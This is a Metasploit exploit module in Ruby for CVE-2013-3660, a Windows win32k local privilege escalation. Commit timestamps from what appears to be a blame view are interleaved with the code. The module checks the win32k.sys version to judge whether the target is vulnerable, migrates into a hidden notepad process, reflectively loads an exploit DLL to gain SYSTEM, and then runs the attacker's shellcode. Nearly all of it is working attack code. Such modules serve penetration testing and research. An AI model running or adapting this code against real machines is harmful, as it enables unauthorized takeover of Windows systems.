2013-06-28 23:18:21 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf :: Exploit :: Local
2013-08-30 21:28:54 +00:00
Rank = AverageRanking
include Msf :: Post :: File
include Msf :: Post :: Windows :: Priv
include Msf :: Post :: Windows :: Process
include Msf :: Post :: Windows :: FileInfo
def initialize ( info = { } )
super ( update_info ( info , {
'Name' = > 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation' ,
'Description' = > %q{
This module exploits a vulnerability on EPATHOBJ :: pprFlattenRec due to the usage
of uninitialized data which allows to corrupt memory . At the moment , the module has
been tested successfully on Windows XP SP3 , Windows 2003 SP1 , and Windows 7 SP1 .
} ,
'License' = > MSF_LICENSE ,
'Author' = >
[
'Tavis Ormandy <taviso[at]cmpxchg8b.com>' , # Vulnerability discovery and Original Exploit
'progmboy <programmeboy[at]gmail.com>' , # Original Exploit
'Keebie4e' , # Metasploit integration
'egypt' , # Metasploit integration
'sinn3r' , # Metasploit integration
'Meatballs' , # Metasploit integration
'juan vazquez' # Metasploit integration
] ,
'Arch' = > ARCH_X86 ,
'Platform' = > 'win' ,
'SessionTypes' = > [ 'meterpreter' ] ,
'DefaultOptions' = >
{
'EXITFUNC' = > 'thread' ,
} ,
'Targets' = >
[
[ 'Automatic' , { } ]
] ,
'Payload' = >
{
'Space' = > 4096 ,
'DisableNops' = > true
} ,
'References' = >
[
[ 'CVE' , '2013-3660' ] ,
[ 'EDB' , '25912' ] ,
[ 'OSVDB' , '93539' ] ,
[ 'URL' , 'http://seclists.org/fulldisclosure/2013/May/91' ] ,
] ,
'DisclosureDate' = > 'May 15 2013' ,
'DefaultTarget' = > 0
} ) )
end
def check
os = sysinfo [ " OS " ]
if os =~ / windows /i
file_path = expand_path ( " %windir% " ) << " \\ system32 \\ win32k.sys "
major , minor , build , revision , branch = file_version ( file_path )
vprint_status ( " win32k.sys file version: #{ major } . #{ minor } . #{ build } . #{ revision } " )
#WinXP x86 - 5.1.2600.6404
#WinXP/2003 5.2.3790.5174
#WinVista/2k8 - 6.0.6002.18861 / 6.0.6002.23132
#Win72k8R2 - 6.1.7601.18176 / 6.1.7601.22348
#Win8/2012 - 6.2.9200.16627 / 6.2.9200.20732
case build
when 2600
return Exploit :: CheckCode :: Vulnerable if revision < 6404
when 3790
return Exploit :: CheckCode :: Vulnerable if revision < 5174
when 6000
return Exploit :: CheckCode :: Vulnerable
when 6001
return Exploit :: CheckCode :: Vulnerable
when 6002
if branch == 18
return Exploit :: CheckCode :: Vulnerable if revision < 18861
else
return Exploit :: CheckCode :: Vulnerable if revision < 23132
end
when 7600
return Exploit :: CheckCode :: Vulnerable
when 7601
if branch == 18
return Exploit :: CheckCode :: Vulnerable if revision < 18176
else
return Exploit :: CheckCode :: Vulnerable if revision < 22348
end
when 9200
if branch == 16
return Exploit :: CheckCode :: Vulnerable if revision < 16627
else
return Exploit :: CheckCode :: Vulnerable if revision < 20732
end
end
end
return Exploit :: CheckCode :: Safe
end
def exploit
if sysinfo [ " Architecture " ] =~ / wow64 /i
fail_with ( Failure :: NoTarget , " Running against WOW64 is not supported " )
elsif sysinfo [ " Architecture " ] =~ / x64 /
fail_with ( Failure :: NoTarget , " Running against 64-bit systems is not supported " )
end
print_status ( " Creating a new process and migrating... " )
cmd = " #{ expand_path ( " %windir% " ) } \\ System32 \\ notepad.exe "
new_proc = session . sys . process . execute ( cmd , nil , { 'Hidden' = > true } )
new_pid = new_proc . pid
if not new_pid
print_error ( " Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself " )
else
print_status ( " Migrating to #{ new_pid } " )
migrate_res = false
begin
migrate_res = session . core . migrate ( new_pid )
rescue :: RuntimeError , :: Rex :: Post :: Meterpreter :: RequestError
migrate_res = false
end
if migrate_res
print_good ( " Successfully migrated to process #{ new_pid } " )
else
print_warning ( " Unable to migrate to process #{ new_pid . to_s } , trying current #{ session . sys . process . getpid } instead. If still unsuccessful, please migrate manually " )
end
end
print_status ( " Trying to load the exploit and executing... " )
session . core . load_library ( {
" LibraryFilePath " = > File . join ( Msf :: Config . install_root , " data " , " exploits " , " cve-2013-3660 " , " exploit.dll " ) ,
" UploadLibrary " = > true ,
" Extension " = > false ,
" TargetFilePath " = > " #{ rand_text_alpha ( 5 + rand ( 3 ) ) } .dll " ,
" SaveToDisk " = > false
} )
print_status ( " Checking privileges after exploitation... " )
if is_system?
print_good ( " Exploitation successful! " )
else
fail_with ( Failure :: Unknown , " The exploitation wasn't successful but should be safe to try again " )
end
if execute_shellcode ( payload . encoded )
print_good ( " Enjoy! " )
else
fail_with ( Failure :: Unknown , " Error while executing the payload " )
end
end
2013-06-28 23:18:21 +00:00
2013-06-29 13:54:00 +00:00
2013-06-28 23:18:21 +00:00
end